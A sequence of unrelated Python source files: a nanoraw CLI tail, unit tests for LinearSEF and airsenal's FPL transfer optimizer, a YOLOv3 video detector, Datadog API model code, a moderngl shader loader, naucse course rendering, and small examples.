'*' * 60 + '\nERROR: Must provide two sets of FAST5s ' + \
'to output difference wiggle files.\n' + '*' * 60 + '\n')
sys.exit()
files1, files2 = nh.get_files_lists(
args.fast5_basedirs, args.fast5_basedirs2)
write_all_wiggles(
files1, files2, args.corrected_group, args.basecall_subgroups,
nh.parse_obs_filter(args.obs_per_base_filter),
args.test_type, args.minimum_test_reads,
args.statistics_filename, args.fishers_method_offset,
args.wiggle_basename, args.wiggle_types)
return
def write_signif_diff_main(args):
global VERBOSE
VERBOSE = not args.quiet
nh.VERBOSE = VERBOSE
ns.VERBOSE = VERBOSE
files1, files2 = nh.get_files_lists(
args.fast5_basedirs, args.fast5_basedirs2)
write_most_signif(
files1, files2, args.num_regions, args.q_value_threshold,
args.corrected_group, args.basecall_subgroups,
args.sequences_filename, args.num_bases, args.test_type,
nh.parse_obs_filter(args.obs_per_base_filter),
args.minimum_test_reads, args.statistics_filename,
args.genome_fasta, args.fishers_method_offset)
return
if __name__ == '__main__':
raise NotImplementedError, (
'This is a module. See commands with `nanoraw -h`')
|
py | 1a4baf536d705b9c814847cb7a708a0e63d5b976 | |
py | 1a4bafaf56136b03e7d2f8f85eb5fd074ba7749d | from sef_dr.linear import LinearSEF
import numpy as np
from sklearn.neighbors import NearestCentroid
def test_linear_sef():
"""
Performs some basic testing using the LinearSEF
:return:
"""
np.random.seed(1)
train_data = np.random.randn(100, 50)
train_labels = np.random.randint(0, 2, 100)
proj = LinearSEF(50, output_dimensionality=12)
proj._initialize(train_data)
proj_data = proj.transform(train_data, batch_size=8)
assert proj_data.shape[0] == 100
assert proj_data.shape[1] == 12
ncc = NearestCentroid()
ncc.fit(proj_data, train_labels)
acc_before = ncc.score(proj_data, train_labels)
loss = proj.fit(data=train_data, target_labels=train_labels, epochs=200,
target='supervised', batch_size=8, regularizer_weight=0, learning_rate=0.0001, verbose=False)
# Ensure that loss is reducing
assert loss[0] > loss[-1]
proj_data = proj.transform(train_data, batch_size=8)
assert proj_data.shape[0] == 100
assert proj_data.shape[1] == 12
ncc = NearestCentroid()
ncc.fit(proj_data, train_labels)
acc_after = ncc.score(proj_data, train_labels)
assert acc_after > acc_before |
py | 1a4bb0ef7aee095592b438e3e95c920da9062f8d | import time
from absl import app, flags, logging
from absl.flags import FLAGS
import cv2
import tensorflow as tf
from yolov3_tf2.models import (
YoloV3, YoloV3Tiny
)
from yolov3_tf2.dataset import transform_images
from yolov3_tf2.utils import draw_outputs
flags.DEFINE_string('classes', './data/coco.names', 'path to classes file')
flags.DEFINE_string('weights', './checkpoints/yolov3.tf',
'path to weights file')
flags.DEFINE_boolean('tiny', False, 'yolov3 or yolov3-tiny')
flags.DEFINE_integer('size', 416, 'resize images to')
flags.DEFINE_string('video', './data/video.mp4',
'path to video file or number for webcam)')
flags.DEFINE_string('output', None, 'path to output video')
flags.DEFINE_string('output_format', 'XVID', 'codec used in VideoWriter when saving video to file')
flags.DEFINE_integer('num_classes', 2 , 'number of classes in the model')
def main(_argv):
physical_devices = tf.config.experimental.list_physical_devices('GPU')
for physical_device in physical_devices:
tf.config.experimental.set_memory_growth(physical_device, True)
if FLAGS.tiny:
yolo = YoloV3Tiny(classes=FLAGS.num_classes)
else:
yolo = YoloV3(classes=FLAGS.num_classes)
yolo.load_weights(FLAGS.weights)
logging.info('weights loaded')
class_names = [c.strip() for c in open(FLAGS.classes).readlines()]
logging.info('classes loaded')
times = []
try:
vid = cv2.VideoCapture(int(FLAGS.video))
except:
vid = cv2.VideoCapture(FLAGS.video)
out = None
if FLAGS.output:
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*FLAGS.output_format)
out = cv2.VideoWriter(FLAGS.output, codec, fps, (width, height))
while True:
_, img = vid.read()
if img is None:
logging.warning("Empty Frame")
time.sleep(0.1)
break
img_in = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img_in = tf.expand_dims(img_in, 0)
img_in = transform_images(img_in, FLAGS.size)
t1 = time.time()
boxes, scores, classes, nums = yolo.predict(img_in)
t2 = time.time()
times.append(t2-t1)
times = times[-20:]
img = draw_outputs(img, (boxes, scores, classes, nums), class_names)
img = cv2.putText(img, "Time: {:.2f}ms".format(sum(times)/len(times)*1000), (0, 30),
cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
if FLAGS.output:
out.write(img)
cv2.imshow('output', img)
if cv2.waitKey(1) == ord('q'):
break
cv2.destroyAllWindows()
if __name__ == '__main__':
try:
app.run(main)
except SystemExit:
pass
|
py | 1a4bb12164c5f5affa547f994822c95ecf7f8412 | import collections
import uuid
Measurement = collections.namedtuple('Measurement', 'id x y value')
measurements = [
Measurement(str(uuid.uuid4()), 1, 1, 72),
Measurement(str(uuid.uuid4()), 2, 1, 40),
Measurement(str(uuid.uuid4()), 3, 1, 11),
Measurement(str(uuid.uuid4()), 2, 1, 90),
Measurement(str(uuid.uuid4()), 2, 2, 60),
Measurement(str(uuid.uuid4()), 2, 3, 73),
Measurement(str(uuid.uuid4()), 3, 1, 40),
Measurement(str(uuid.uuid4()), 3, 2, 90),
Measurement(str(uuid.uuid4()), 3, 3, 90)
]
# c-style (loops)
high_measurements1 = []
count = len(measurements)
index = 0
while index < count:
m = measurements[index]
if m.value >= 70:
high_measurements1.append(m)
index += 1
print(high_measurements1)
# in python it should look like this, but it's still loop...
high_measurements_1 = []
for m in measurements:
if m.value >= 70:
high_measurements_1.append(m.value)
print(high_measurements_1)
# list of high values via comprehension
high_measurements2 = [
m.value
for m in measurements
if m.value >= 70
]
print(high_measurements2)
# via generator expression
high_m_gen = (
m.value
for m in measurements
if m.value >= 70
)
print(high_m_gen)
high_measurements3 = list(high_m_gen) # process the generator to get something printable
print(high_measurements3)
# high value dict via comprehension
high_m_by_id = {
m.id: m
for m in measurements
if m.value >= 70
}
print(high_m_by_id)
# high value distinct via set
high_values_distinct = {
m.value
for m in measurements
if m.value >= 70
}
print(high_values_distinct) |
py | 1a4bb15665868e4e971653e804b4788698e4589a | import json
with open("data/story.json", "r") as story_file:
story = json.load(story_file)
messages,\
defaults,\
zones\
= story.values()
# for zone in zones:
# rooms = zones[zone]
# for room in rooms:
# # room is currently the key of the room obj
# features = rooms[room]["features"]
# items = rooms[room]["items"]
# print(f"{room}: ->")
# print(f" feats-")
# for feature in features:
# print(" " + feature)
# print(f" items-")
# for item in items:
# print(" " + item) |
py | 1a4bb178a7335dd67d0bcf1cdde6d3b5a3463bd8 | # Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
import re # noqa: F401
import sys # noqa: F401
from datadog_api_client.v1.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from datadog_api_client.v1.model.log_stream_widget_definition import LogStreamWidgetDefinition
from datadog_api_client.v1.model.notebook_cell_time import NotebookCellTime
from datadog_api_client.v1.model.notebook_distribution_cell_attributes import NotebookDistributionCellAttributes
from datadog_api_client.v1.model.notebook_graph_size import NotebookGraphSize
from datadog_api_client.v1.model.notebook_heat_map_cell_attributes import NotebookHeatMapCellAttributes
from datadog_api_client.v1.model.notebook_log_stream_cell_attributes import NotebookLogStreamCellAttributes
from datadog_api_client.v1.model.notebook_markdown_cell_attributes import NotebookMarkdownCellAttributes
from datadog_api_client.v1.model.notebook_split_by import NotebookSplitBy
from datadog_api_client.v1.model.notebook_timeseries_cell_attributes import NotebookTimeseriesCellAttributes
from datadog_api_client.v1.model.notebook_toplist_cell_attributes import NotebookToplistCellAttributes
globals()["LogStreamWidgetDefinition"] = LogStreamWidgetDefinition
globals()["NotebookCellTime"] = NotebookCellTime
globals()["NotebookDistributionCellAttributes"] = NotebookDistributionCellAttributes
globals()["NotebookGraphSize"] = NotebookGraphSize
globals()["NotebookHeatMapCellAttributes"] = NotebookHeatMapCellAttributes
globals()["NotebookLogStreamCellAttributes"] = NotebookLogStreamCellAttributes
globals()["NotebookMarkdownCellAttributes"] = NotebookMarkdownCellAttributes
globals()["NotebookSplitBy"] = NotebookSplitBy
globals()["NotebookTimeseriesCellAttributes"] = NotebookTimeseriesCellAttributes
globals()["NotebookToplistCellAttributes"] = NotebookToplistCellAttributes
class NotebookCellResponseAttributes(ModelComposed):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (
bool,
date,
datetime,
dict,
float,
int,
list,
str,
none_type,
) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {}
@cached_property
def discriminator():
return None
attribute_map = {}
required_properties = set(
[
"_data_store",
"_check_type",
"_spec_property_naming",
"_path_to_item",
"_configuration",
"_visited_composed_classes",
"_composed_instances",
"_var_name_to_model_instances",
"_additional_properties_model_instances",
]
)
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""NotebookCellResponseAttributes - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
graph_size (NotebookGraphSize): [optional] # noqa: E501
split_by (NotebookSplitBy): [optional] # noqa: E501
time (NotebookCellTime): [optional] # noqa: E501
definition (LogStreamWidgetDefinition): [optional] # noqa: E501
"""
_check_type = kwargs.pop("_check_type", True)
_spec_property_naming = kwargs.pop("_spec_property_naming", False)
_path_to_item = kwargs.pop("_path_to_item", ())
_configuration = kwargs.pop("_configuration", None)
_visited_composed_classes = kwargs.pop("_visited_composed_classes", ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments."
% (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
constant_args = {
"_check_type": _check_type,
"_path_to_item": _path_to_item,
"_spec_property_naming": _spec_property_naming,
"_configuration": _configuration,
"_visited_composed_classes": self._visited_composed_classes,
}
required_args = {}
model_args = {}
model_args.update(required_args)
model_args.update(kwargs)
composed_info = validate_get_composed_info(constant_args, model_args, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
unused_args = composed_info[3]
for var_name, var_value in required_args.items():
setattr(self, var_name, var_value)
for var_name, var_value in kwargs.items():
if (
var_name in unused_args
and self._configuration is not None
and self._configuration.discard_unknown_keys
and not self._additional_properties_model_instances
):
# discard variable.
continue
setattr(self, var_name, var_value)
@cached_property
def _composed_schemas():
# we need this here to make our import statements work
# we must store _composed_schemas in here so the code is only run
# when we invoke this method. If we kept this at the class
# level we would get an error beause the class level
# code would be run when this module is imported, and these composed
# classes don't exist yet because their module has not finished
# loading
lazy_import()
return {
"anyOf": [],
"allOf": [],
"oneOf": [
NotebookDistributionCellAttributes,
NotebookHeatMapCellAttributes,
NotebookLogStreamCellAttributes,
NotebookMarkdownCellAttributes,
NotebookTimeseriesCellAttributes,
NotebookToplistCellAttributes,
],
}
|
py | 1a4bb17e272d7fcbe8d5761006a56790c79a4444 | from abc import abstractmethod
from bmipy import Bmi
class Xmi(Bmi):
"""
This class extends the CSDMS Basic Model Interface
The extension to the BMI is twofold:
- the model's outer convergence loop is exposed to facilitate coupling at
this level
- a model can have sub-components which share the time stepping but have
their own convergence loop
It does not change anything in the BMI interface, so models implementing
the XMI interface are compatible with BMI
"""
@abstractmethod
def prepare_time_step(self, dt) -> None:
""" """
...
@abstractmethod
def do_time_step(self) -> None:
""" """
...
@abstractmethod
def finalize_time_step(self) -> None:
""" """
...
@abstractmethod
def get_subcomponent_count(self) -> int:
""" """
...
@abstractmethod
def prepare_solve(self, component_id) -> None:
""" """
...
@abstractmethod
def solve(self, component_id) -> bool:
""" """
...
@abstractmethod
def finalize_solve(self, component_id) -> None:
""" """
...
|
py | 1a4bb1abe3d6b465c612060aa5cd967966c93e33 | import logging
import moderngl
from moderngl_window.loaders.base import BaseLoader
from moderngl_window.opengl import program
from moderngl_window.exceptions import ImproperlyConfigured
logger = logging.getLogger(__name__)
class Loader(BaseLoader):
kind = "single"
def load(self) -> moderngl.Program:
"""Loads a shader program from a single glsl file.
Each shader type is separated by preprocessors
- VERTEX_SHADER
- FRAGMENT_SHADER
- GEOMETRY_SHADER
- TESS_CONTROL_SHADER
- TESS_EVALUATION_SHADER
Example:
.. code:: glsl
#version 330
#if defined VERTEX_SHADER
in vec3 in_position;
in vec2 in_texcoord_0;
out vec2 uv0;
void main() {
gl_Position = vec4(in_position, 1);
uv0 = in_texcoord_0;
}
#elif defined FRAGMENT_SHADER
out vec4 fragColor;
uniform sampler2D texture0;
in vec2 uv0;
void main() {
fragColor = texture(texture0, uv0);
}
#endif
Returns:
moderngl.Program: The Program instance
"""
self.meta.resolved_path, source = self._load_source(self.meta.path)
shaders = program.ProgramShaders.from_single(self.meta, source)
shaders.handle_includes(self._load_source)
prog = shaders.create()
# Wrap the program if reloadable is set
if self.meta.reloadable:
# Disable reload flag so reloads will return Program instances
self.meta.reloadable = False
# Wrap it ..
prog = program.ReloadableProgram(self.meta, prog)
return prog
def _load_source(self, path):
"""Finds and loads a single source file.
Args:
path: Path to resource
Returns:
Tuple[resolved_path, source]: The resolved path and the source
"""
resolved_path = self.find_program(path)
if not resolved_path:
raise ImproperlyConfigured("Cannot find program '{}'".format(path))
logger.info("Loading: %s", path)
with open(str(resolved_path), "r") as fd:
return resolved_path, fd.read()
|
py | 1a4bb3483c40c3f5149f9071e503d08d03390d49 | from datetime import date, datetime, time
from typing import Any, Dict, Optional
from flask import url_for
from flask_frozen import UrlForLogger
from git import Repo
from naucse import views
from naucse.models import Course
from naucse.utils.views import page_content_cache_key, get_edit_info
def get_course_from_slug(slug: str) -> Course:
""" Gets the actual course instance from a slug.
"""
parts = slug.split("/")
if parts[0] == "course":
return views.model.courses[parts[1]]
else:
return views.model.runs[(int(parts[0]), parts[1])]
def course_info(slug: str, *args, **kwargs) -> Dict[str, Any]:
"""Return info about the given course.
Return some extra info when it's a run (based on COURSE_INFO/RUN_INFO)
"""
course = get_course_from_slug(slug)
if course.is_link():
raise ValueError("Circular dependency.")
if "course" in slug:
attributes = Course.COURSE_INFO
else:
attributes = Course.RUN_INFO
data = {}
for attr in attributes:
val = getattr(course, attr)
if isinstance(val, (date, datetime, time)):
val = val.isoformat()
data[attr] = val
return data
def serialize_license(license) -> Optional[Dict[str, str]]:
"""Serialize a License instance into a dict.
"""
if license:
return {
"url": license.url,
"title": license.title
}
return None
def render(page_type: str, slug: str, *args, **kwargs) -> Dict[str, Any]:
"""Return a rendered page for a course, based on page_type and slug.
"""
course = get_course_from_slug(slug)
if course.is_link():
raise ValueError("Circular dependency.")
path = []
if kwargs.get("request_url"):
path = [kwargs["request_url"]]
logger = UrlForLogger(views.app)
with views.app.test_request_context(*path):
with logger:
info = {
"course": {
"title": course.title,
"url": views.course_url(course),
"vars": course.vars,
"canonical": course.canonical,
"is_derived": course.is_derived,
},
}
if page_type == "course":
info["content"] = views.course_content(course)
info["edit_info"] = get_edit_info(course.edit_path)
elif page_type == "calendar":
info["content"] = views.course_calendar_content(course)
info["edit_info"] = get_edit_info(course.edit_path)
elif page_type == "calendar_ics":
info["calendar"] = str(views.generate_calendar_ics(course))
info["edit_info"] = get_edit_info(course.edit_path)
elif page_type == "course_page":
lesson_slug, page, solution, *_ = args
lesson = views.model.get_lesson(lesson_slug)
content_offer_key = kwargs.get("content_key")
not_processed = object()
content = not_processed
if content_offer_key is not None:
# the base repository has a cached version of the content
content_key = page_content_cache_key(Repo("."), lesson_slug, page, solution, course.vars)
# if the key matches what would be produced here, let's not return anything
# and the cached version will be used
if content_offer_key == content_key:
content = None
request_url = kwargs.get("request_url")
if request_url is None:
request_url = url_for('course_page', course=course, lesson=lesson, page=page, solution=solution)
lesson_url, subpage_url, static_url = views.relative_url_functions(request_url, course, lesson)
page, session, prv, nxt = views.get_page(course, lesson, page)
# if content isn't cached or the version was refused, let's render
# the content here (but just the content and not the whole page with headers, menus etc)
if content is not_processed:
content = views.page_content(
lesson, page, solution, course,
lesson_url=lesson_url,
subpage_url=subpage_url,
static_url=static_url,
without_cache=True,
)
if content is None:
info["content"] = None
info["content_urls"] = []
else:
info["content"] = content["content"]
info["content_urls"] = content["urls"]
info.update({
"page": {
"title": page.title,
"css": page.info.get("css"), # not page.css since we want the css without limitation
"latex": page.latex,
"attributions": page.attributions,
"license": serialize_license(page.license),
"license_code": serialize_license(page.license_code)
},
"edit_info": get_edit_info(page.edit_path)
})
if session is not None:
info["session"] = {
"title": session.title,
"url": url_for("session_coverpage", course=course.slug, session=session.slug),
"slug": session.slug,
}
prev_link, session_link, next_link = views.get_footer_links(course, session, prv, nxt, lesson_url)
info["footer"] = {
"prev_link": prev_link,
"session_link": session_link,
"next_link": next_link
}
elif page_type == "session_coverpage":
session_slug, coverpage, *_ = args
session = course.sessions.get(session_slug)
info.update({
"session": {
"title": session.title,
"url": url_for("session_coverpage", course=course.slug, session=session.slug),
},
"content": views.session_coverpage_content(course, session, coverpage),
"edit_info": get_edit_info(session.get_edit_path(course, coverpage)),
})
else:
raise ValueError("Invalid page type.")
# generate list of absolute urls which need to be frozen further
urls = set()
for endpoint, values in logger.iter_calls():
url = url_for(endpoint, **values)
if url.startswith(f"/{slug}"): # this is checked once again in main repo, but let's save cache space
urls.add(url)
info["urls"] = list(urls)
return info
def get_footer_links(slug, lesson_slug, page, request_url=None):
course = get_course_from_slug(slug)
if course.is_link():
raise ValueError("Circular dependency.")
try:
lesson = views.model.get_lesson(lesson_slug)
except LookupError:
raise ValueError("Lesson not found")
path = []
if request_url is not None:
path = [request_url]
with views.app.test_request_context(*path):
def lesson_url(lesson, *args, **kwargs):
return url_for("course_page", course=course, lesson=lesson, *args, **kwargs)
page, session, prv, nxt = views.get_page(course, lesson, page)
prev_link, session_link, next_link = views.get_footer_links(course, session, prv, nxt, lesson_url)
return {
"prev_link": prev_link,
"session_link": session_link,
"next_link": next_link
}
|
py | 1a4bb3aa2209410ce07416c261c2328a63d3bef8 | """
Test the optimization of transfers, generating a few simplified scenarios
and checking that the optimizer finds the expected outcome.
"""
from unittest import mock
from operator import itemgetter
from airsenal.framework.squad import Squad
from airsenal.framework.optimization_utils import (
get_discount_factor,
next_week_transfers,
count_expected_outputs,
)
from airsenal.framework.optimization_transfers import (
make_optimum_single_transfer,
make_optimum_double_transfer,
)
class DummyPlayer(object):
"""
fake player that we can add to a squad, giving a specified expected score.
"""
def __init__(self, player_id, position, points_dict):
"""
we generate squad to avoid >3-players-per-team problem,
and set price to 0 to avoid overrunning budget.
"""
self.player_id = player_id
self.fpl_api_id = player_id
self.name = "player_{}".format(player_id)
self.position = position
self.team = "DUMMY_TEAM_{}".format(player_id)
self.purchase_price = 0
self.is_starting = True
self.is_captain = False
self.is_vice_captain = False
self.predicted_points = {"DUMMY": points_dict}
self.sub_position = None
def calc_predicted_points(self, dummy):
pass
def generate_dummy_squad(player_points_dict=None):
"""
Fill a squad up with dummy players.
player_points_dict is a dictionary
{ player_id: { gw: points,...} ,...}
"""
if not player_points_dict: # make a simple one
player_points_dict = {i: {1: 2} for i in range(15)}
t = Squad()
for i in range(15):
if i < 2:
position = "GK"
elif i < 7:
position = "DEF"
elif i < 12:
position = "MID"
else:
position = "FWD"
t.add_player(DummyPlayer(i, position, player_points_dict[i]))
return t
def predicted_point_mock_generator(point_dict):
"""
return a function that will mock the get_predicted_points function
the point_dict it is given should be keyed by position, i.e.
{"GK" : {player_id: points, ...}, "DEF": {}, ... }
"""
def mock_get_predicted_points(gameweek, tag, position, team=None):
"""
return an ordered list in the same way as the real
get_predicted_points func does. EXCEPT - we return dummy players rather
than just ids (so the Squad.add_player can add them)
"""
output_pid_list = [(k, v) for k, v in point_dict[position].items()]
output_pid_list.sort(key=itemgetter(1), reverse=True)
# return output_pid_list
if isinstance(gameweek, list):
gameweek = gameweek[0]
return [
(DummyPlayer(entry[0], position, {gameweek: entry[1]}), entry[1])
for entry in output_pid_list
]
return mock_get_predicted_points
def test_subs():
"""
mock squads with some players predicted some points, and
some predicted to score zero, and check we get the right starting 11.
"""
points_dict = {
0: {1: 0},
1: {1: 2},
2: {1: 2},
3: {1: 2},
4: {1: 0},
5: {1: 2},
6: {1: 2},
7: {1: 2},
8: {1: 2},
9: {1: 0},
10: {1: 2},
11: {1: 4},
12: {1: 0},
13: {1: 2},
14: {1: 3},
}
# should get 4,4,2, with players 0,4,9,12 on the bench,
# captain player 11, vice-captain player 14
# should have 29 points (9*2 + 3 + (2*4) )
t = generate_dummy_squad(points_dict)
ep = t.get_expected_points(1, "DUMMY")
assert ep == 29
assert t.players[0].is_starting is False
assert t.players[4].is_starting is False
assert t.players[9].is_starting is False
assert t.players[12].is_starting is False
assert t.players[11].is_captain is True
assert t.players[14].is_vice_captain is True
def test_single_transfer():
"""
mock squad with all players predicted 2 points, and potential transfers
with higher scores, check we get the best transfer.
"""
t = generate_dummy_squad()
position_points_dict = {
"GK": {0: 2, 1: 2, 100: 0, 101: 0, 200: 3, 201: 2}, # in the orig squad
"DEF": {
2: 2,
3: 2,
4: 2,
5: 2,
6: 2, # in the orig squad
103: 0,
104: 0,
105: 5,
106: 2,
107: 2,
203: 0,
204: 0,
205: 1,
206: 2,
207: 2,
},
"MID": {
7: 2,
8: 2,
9: 2,
10: 2,
11: 2, # in the orig squad
108: 2,
109: 2,
110: 3,
111: 3,
112: 0,
208: 2,
209: 2,
210: 3,
211: 3,
212: 0,
},
"FWD": {12: 2, 13: 2, 14: 2, 113: 6, 114: 3, 115: 7}, # in the orig squad
}
mock_pred_points = predicted_point_mock_generator(position_points_dict)
with mock.patch(
"airsenal.framework.optimization_transfers.get_predicted_points",
side_effect=mock_pred_points,
):
new_squad, pid_out, pid_in = make_optimum_single_transfer(t, "DUMMY", [1])
# we should expect - player 115 to be transfered in, and to be captain.
assert pid_in[0] == 115
for p in new_squad.players:
if p.player_id == 115:
assert p.is_captain is True
else:
assert p.is_captain is False
# expected points should be 10*2 + 7*2 = 34
assert new_squad.get_expected_points(1, "DUMMY") == 34
def test_double_transfer():
"""
mock squad with two players predicted low score, see if we get better players
transferred in.
"""
t = generate_dummy_squad()
position_points_dict = {
"GK": {0: 2, 1: 2, 100: 0, 101: 0, 200: 3, 201: 7}, # in the orig squad
"DEF": {
2: 2,
3: 2,
2: 2,
5: 2,
6: 2, # in the orig squad
103: 0,
104: 0,
105: 5,
106: 2,
107: 2,
203: 0,
204: 0,
205: 1,
206: 2,
207: 2,
},
"MID": {
7: 2,
8: 2,
9: 2,
10: 2,
11: 2, # in the orig squad
108: 2,
109: 2,
110: 3,
111: 3,
112: 0,
208: 2,
209: 2,
210: 3,
211: 3,
212: 0,
},
"FWD": {12: 2, 13: 2, 14: 2, 113: 6, 114: 3, 115: 8}, # in the orig squad
}
mock_pred_points = predicted_point_mock_generator(position_points_dict)
with mock.patch(
"airsenal.framework.optimization_transfers.get_predicted_points",
side_effect=mock_pred_points,
):
new_squad, pid_out, pid_in = make_optimum_double_transfer(t, "DUMMY", [1])
# we should expect 201 and 115 to be transferred in, and 1,15 to
# be transferred out. 115 should be captain
assert 201 in pid_in
assert 115 in pid_in
print(new_squad)
for p in new_squad.players:
if p.player_id == 115:
assert p.is_captain is True
else:
assert p.is_captain is False
def test_get_discount_factor():
"""
Discount factor discounts future gameweek score predictions based on the
number of gameweeks ahead. It uses two discount types based on a discount
of 14/15, exponential ({14/15}^{weeks ahead}) and constant
(1-{14/15}*weeks ahead)
"""
assert get_discount_factor(1, 4) == (14 / 15) ** (4 - 1)
assert get_discount_factor(1, 4, "constant") == 1 - ((1 / 15) * (4 - 1))
assert get_discount_factor(1, 20, "const") == 0
assert get_discount_factor(1, 1, "const") == 1
assert get_discount_factor(1, 1, "exp") == 1
def test_next_week_transfers_no_chips_no_constraints():
# First week (blank starting strat with 1 free transfer available)
strat = (1, 0, {"players_in": {}, "chips_played": {}})
# No chips or constraints
actual = next_week_transfers(
strat,
max_total_hit=None,
allow_unused_transfers=True,
max_transfers=2,
)
# (no. transfers, free transfers following week, points hit)
expected = [(0, 2, 0), (1, 1, 0), (2, 1, 4)]
assert actual == expected
def test_next_week_transfers_any_chip_no_constraints():
# All chips, no constraints
strat = (1, 0, {"players_in": {}, "chips_played": {}})
actual = next_week_transfers(
strat,
max_total_hit=None,
max_transfers=2,
chips={
"chips_allowed": ["wildcard", "free_hit", "bench_boost", "triple_captain"],
"chip_to_play": None,
},
)
expected = [
(0, 2, 0),
(1, 1, 0),
(2, 1, 4),
("W", 1, 0),
("F", 1, 0),
("B0", 2, 0),
("B1", 1, 0),
("B2", 1, 4),
("T0", 2, 0),
("T1", 1, 0),
("T2", 1, 4),
]
assert actual == expected
def test_next_week_transfers_no_chips_zero_hit():
# No points hits
strat = (1, 0, {"players_in": {}, "chips_played": {}})
actual = next_week_transfers(
strat,
max_total_hit=0,
allow_unused_transfers=True,
max_transfers=2,
)
expected = [(0, 2, 0), (1, 1, 0)]
assert actual == expected
def test_next_week_transfers_2ft_no_unused():
# 2 free transfers available, no wasted transfers
strat = (2, 0, {"players_in": {}, "chips_played": {}})
actual = next_week_transfers(
strat,
max_total_hit=None,
allow_unused_transfers=False,
max_transfers=2,
)
expected = [(1, 2, 0), (2, 1, 0)]
assert actual == expected
def test_next_week_transfers_chips_already_used():
# Chips allowed but previously used
strat = (
1,
0,
{
"players_in": {},
"chips_played": {
1: "wildcard",
2: "free_hit",
3: "bench_boost",
4: "triple_captain",
},
},
)
actual = next_week_transfers(
strat,
max_total_hit=None,
max_transfers=2,
)
expected = [(0, 2, 0), (1, 1, 0), (2, 1, 4)]
assert actual == expected
def test_next_week_transfers_play_wildcard():
strat = (1, 0, {"players_in": {}, "chips_played": {}})
actual = next_week_transfers(
strat,
max_total_hit=None,
max_transfers=2,
chips={"chips_allowed": [], "chip_to_play": "wildcard"},
)
expected = [("W", 1, 0)]
assert actual == expected
def test_next_week_transfers_2ft_allow_wildcard():
strat = (2, 0, {"players_in": {}, "chips_played": {}})
actual = next_week_transfers(
strat,
max_total_hit=None,
max_transfers=2,
chips={"chips_allowed": ["wildcard"], "chip_to_play": None},
)
expected = [(0, 2, 0), (1, 2, 0), (2, 1, 0), ("W", 1, 0)]
assert actual == expected
def test_next_week_transfers_2ft_allow_wildcard_no_unused():
strat = (2, 0, {"players_in": {}, "chips_played": {}})
actual = next_week_transfers(
strat,
max_total_hit=None,
allow_unused_transfers=False,
max_transfers=2,
chips={"chips_allowed": ["wildcard"], "chip_to_play": None},
)
expected = [(1, 2, 0), (2, 1, 0), ("W", 1, 0)]
assert actual == expected
def test_next_week_transfers_2ft_play_wildcard():
strat = (2, 0, {"players_in": {}, "chips_played": {}})
actual = next_week_transfers(
strat,
max_total_hit=None,
max_transfers=2,
chips={"chips_allowed": [], "chip_to_play": "wildcard"},
)
expected = [("W", 1, 0)]
assert actual == expected
def test_next_week_transfers_2ft_play_bench_boost_no_unused():
strat = (2, 0, {"players_in": {}, "chips_played": {}})
actual = next_week_transfers(
strat,
max_total_hit=None,
allow_unused_transfers=False,
max_transfers=2,
chips={"chips_allowed": [], "chip_to_play": "bench_boost"},
)
expected = [("B1", 2, 0), ("B2", 1, 0)]
assert actual == expected
def test_next_week_transfers_play_triple_captain_max_transfers_3():
strat = (1, 0, {"players_in": {}, "chips_played": {}})
actual = next_week_transfers(
strat,
max_total_hit=None,
allow_unused_transfers=True,
max_transfers=3,
chips={"chips_allowed": [], "chip_to_play": "triple_captain"},
)
expected = [("T0", 2, 0), ("T1", 1, 0), ("T2", 1, 4), ("T3", 1, 8)]
assert actual == expected
